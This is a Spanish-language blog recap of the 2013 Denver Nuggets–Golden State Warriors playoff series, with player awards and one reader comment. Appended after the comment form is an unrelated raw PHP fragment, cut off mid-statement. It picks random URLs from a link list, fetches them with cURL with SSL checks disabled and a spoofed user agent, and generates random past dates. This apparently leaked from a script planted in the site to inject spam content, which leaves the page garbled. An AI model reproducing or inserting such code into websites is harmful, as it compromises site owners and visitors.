Resumen Denver Nuggets 2 – Golden State Warriors 4

05 de May de 2013 por Viva_Dirk

Preciosa serie la que nos han dejado Denver y Golden State como muestran los 107 puntos por partido que han tenido que anotar los de la bahía para llevársela. Y eso que ambos equipos han sufrido bajas sensibles. La baja de Danilo Gallinari ha dejado a los Nuggets huérfanos de su mejor tirador exterior y segundo máximo anotador, algo que no han podido suplir del todo ni con la amplísima plantilla de la que disponen. En cambio los Warriors han cubierto la baja de su referencia interior tras el primer partido con aún mas ritmo de juego ofensivo, la intensidad de Draymond Green y la calidad de Carl Landry.

Si nos centramos únicamente en la serie dejando a un lado los factores indirectos que la han influido no podemos sinó repetir una y mil veces el nombre de Stephen Curry que ha dominado la serie como solo hacen las leyendas. A estas alturas de la temporada espero que no sorprenda a nadie si digo que Curry puede mirar a la cara a cualquiera en lo que a talento puro se refiere, no parece diferenciar el término ‘facil’ de ‘dificil’ si se trata de anotar una canasta. La naturalidad con la que juega es pasmosa. En ausencia de Lee hemos visto una versión espectacular de Jarrett Jack, que se ha ido a nada menos que a un 52.6% en tiros de campo, un puñal que se clavaba una y otra vez en el corazón de los Nuggets. No podemos nombrar negativamente a ningún jugador de Marc Jackson, ya que cada uno en su faceta han estado entre bien y muy bien. 

En los Nuggets tampoco es que nadie nos halla decepcionado profundamente pero si nos ha extrañado el cambio en la rotación. Koufos, McGee y Faried deberían haber dominado la zona con la baja de David Lee y en lugar de eso han visto reducidos sus minutos e importancia para entrar en un juego donde los Warriors se siente aún más cómodos que los Nuggets. La pareja formada por Ty Lawson y Andre Iguodala ha cuajado una serie realmente brillante. El primero, a pesar de tener que bailar con la más fea toda la serie, ha sido capaz de anotar con fluidez y repartir juego, mientras que el segundo ha ejercido de hombre orquesta con un nivel de acierto muy alto. Wilson Chandler no ha podido hacer olvidar a Gallinari y como decimos el juego interior no ha marcado diferencia alguna.

Los Warriors han jugado mejor sus bazas, lo que habla de una victoria táctica de Marc Jackson ante nada menos que George Karl.

PREMIOS

MVP: Stephen Curry lleva todo el año en la élite de la liga y en esta serie simplemente nos ha enamorado. Sus 24.3 puntos, 4.3 rebotes, 9.3 asistencias y 2.2 robos con un 43.4% en triples son una gran muestra del juego desplegado pero muy pequeña si la comparamos con las sensaciones que transmite.

Rookie: Gran papel de Harrison Barnes en su primera eliminatoria de playoffs ejerciendo minutos como falso ala-pivot y cuando no, viéndose las caras con un gran Andre Iguodala. No cualquier novato sube tanto su rendimiento de la regular season a los playoffs como ha hecho Barnes que ha terminado con 14.8 puntos y 5.5 rebotes.

Sorpresa: Jarrett Jack ya había atravesado durante la temporada momentos muy dulces pero sus 18.8 puntos, 5.2 rebotes y 7 asistencias con porcentajes de pívot llegando a ocupar en un mismo partido las 3 posiciones exteriores dejan ver un jugador en el mejor momento de su carrera. Tampoco está nada mal el rendimiento de Andrew Bogut después de un gran periodo de inactividad.

Decepción: No podemos señalar a nadie de forma individual así que, como suele pasar en estos casos nos fijamos en quien los dirige. Todo un ilustre de los banquillos como George Karl se ha visto sorprendido por casi un novato como Marc Jackson.

Esfuerzo en vano: Andre Iguodala y Ty Lawson han sumado 40 puntos, 11 rebotes y 13 asistencias en esta serie. Ambos parecen apuestas seguras para el futuro de Denver.

Comenta

Un comentario a esta entrada

  1. GreenPride dice:
    #1

    La mejor serie de esta primera ronda para mí. Los Warriors parecían muertos tras la derrota en el último segundo del primer partido (grande Andre Miller) y la pérdida de David Lee pero no ha sido así.
    La pérdida de Lee la han suplido magníficamente con Landry, Green y el mejor Bogut desde que volvió de su lesión (decisivo en el 6º) y su apuesta definitiva por el small ball ha sacado los colores a Denver. Estos se han encontrado la orma de su zapato, otro equipo que jugaba rápido y a anotar cuantos más puntos mejor pero que además tenía mejores anotadores que ellos y es que Curry, Jack, Thompson, Landry y Barnes han martilleado constantemente el aro de los Nuggets. Por estos Lawson e Iguodala han estado fenomenales pero sus interiores no han dominado en absoluto el juego y su falta de lanzadores ha contrapuesto con los triplazos que les llovían del otro lado.
    Esta serie ha encumbrado particularmente a un hombre Stephen Curry. Jugando con un tobillo tocado ha sabido esperar sus increíbles rachas y cuando ha cogido una ha destrozado literalmente a los de Denver. Nadie ha podido parar su combinación de tiro letal, rapidez y visión de juego y ha traído de cabeza a toda la defensa. En los 2 últimos partidos tras cada bloqueo Denver le puso doble marcaje para hacerle soltar la bola y ahí el resto de sus compañeros que son también muy buenos cara al aro fueron los que lo hicieron pagar a Denver.
    Mención especial para dos hombres. Jarret Jack ha sido un puñal toda la serie, siempre con buenas decisiones y martilleando con sus entradas y juego de media distancia. Harrison Barnes ha sido una pesadilla desde el alero, anotando cada vez que la defensa se centraba en los demás y jugando con intensidad.
    Para los Nuggets la temporada acaba con decepción grande tras su gran regular pero si no se vuelven locos tienen los mimbres para construir un equipazo. Quizás se deberían pensar si sacrificar algo de profundidad para intentar contar con un jugador referencia que pueda marcar diferencias como lo ha hecho Curry en estas series.
    Y para los Warriors, una vez lanzados ir sin nada que perder a por los Spurs. Pueden y deben plantar cara aunque la defensa de los de San Antonio no les va a dejar tantos espacios.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>